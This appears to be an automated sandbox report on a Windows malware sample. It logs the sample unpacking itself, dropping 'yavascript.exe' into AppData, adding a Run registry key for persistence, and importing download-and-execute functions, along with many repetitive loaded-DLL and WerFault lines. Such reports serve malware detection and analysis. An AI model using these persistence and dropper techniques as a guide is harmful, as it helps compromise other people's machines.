Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: dCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Administrator	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: User	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	35_2_0040D767

Source: 2iH7rqx9rQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2iH7rqx9rQ.exe	Virustotal: Detection: 56%
Source: 2iH7rqx9rQ.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

File read: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2iH7rqx9rQ.exe "C:\Users\user\Desktop\2iH7rqx9rQ.exe"
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 928
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1080
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1120
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1128
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1140
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1152
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1180
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 916
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 668
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 520
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 736
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 676
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 752
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"	Jump to behavior

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Unpacked PE file: 0.2.2iH7rqx9rQ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Unpacked PE file: 23.2.yavascript.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Unpacked PE file: 24.2.yavascript.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Unpacked PE file: 35.2.yavascript.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_0041BCE3

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004567E0 push eax; ret	0_2_004567FE
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0045B9DD push esi; ret	0_2_0045B9E6
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00463EF3 push ds; retf	0_2_00463EEC
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00455EAF push ecx; ret	0_2_00455EC2
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00433FF6 push ecx; ret	0_2_00434009
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_008A1E22 pushfd ; ret	0_2_008A1E23
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0089EFAD push es; ret	0_2_0089EFBA
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0247724F push edx; retf	0_2_02477252
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024A425D push ecx; ret	0_2_024A4270
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0249409D push esi; ret	0_2_0249409F
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024C6116 push ecx; ret	0_2_024C6129
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024C6A47 push eax; ret	0_2_024C6A65
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02485EC9 push edi; ret	0_2_02485ECA
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02485C73 push esp; ret	0_2_02485C74
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004567E0 push eax; ret	23_2_004567FE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0045B9DD push esi; ret	23_2_0045B9E6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00463EF3 push ds; retf	23_2_00463EEC
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00455EAF push ecx; ret	23_2_00455EC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00433FF6 push ecx; ret	23_2_00434009
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B0409D push esi; ret	23_2_00B0409F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B36116 push ecx; ret	23_2_00B36129
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE724F push edx; retf	23_2_00AE7252
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B1425D push ecx; ret	23_2_00B14270
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B36A47 push eax; ret	23_2_00B36A65
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AF5C73 push esp; ret	23_2_00AF5C74
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AF5EC9 push edi; ret	23_2_00AF5ECA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B7B6B1 push ss; retf 0077h	23_2_00B7B6C2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B8182A pushfd ; ret	23_2_00B8182B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B7E9B5 push es; ret	23_2_00B7E9C2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004567E0 push eax; ret	24_2_004567FE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0045B9DD push esi; ret	24_2_0045B9E6

Source: 2iH7rqx9rQ.exe	Static PE information: section name: .text entropy: 7.606690155614193
Source: yavascript.exe.0.dr	Static PE information: section name: .text entropy: 7.606690155614193

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00406128 ShellExecuteW,URLDownloadToFileW,

0_2_00406128

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

File created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983

Jump to behavior

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

0_2_00419BC4

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983			Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983			Jump to behavior

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

0_2_0041BCE3

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
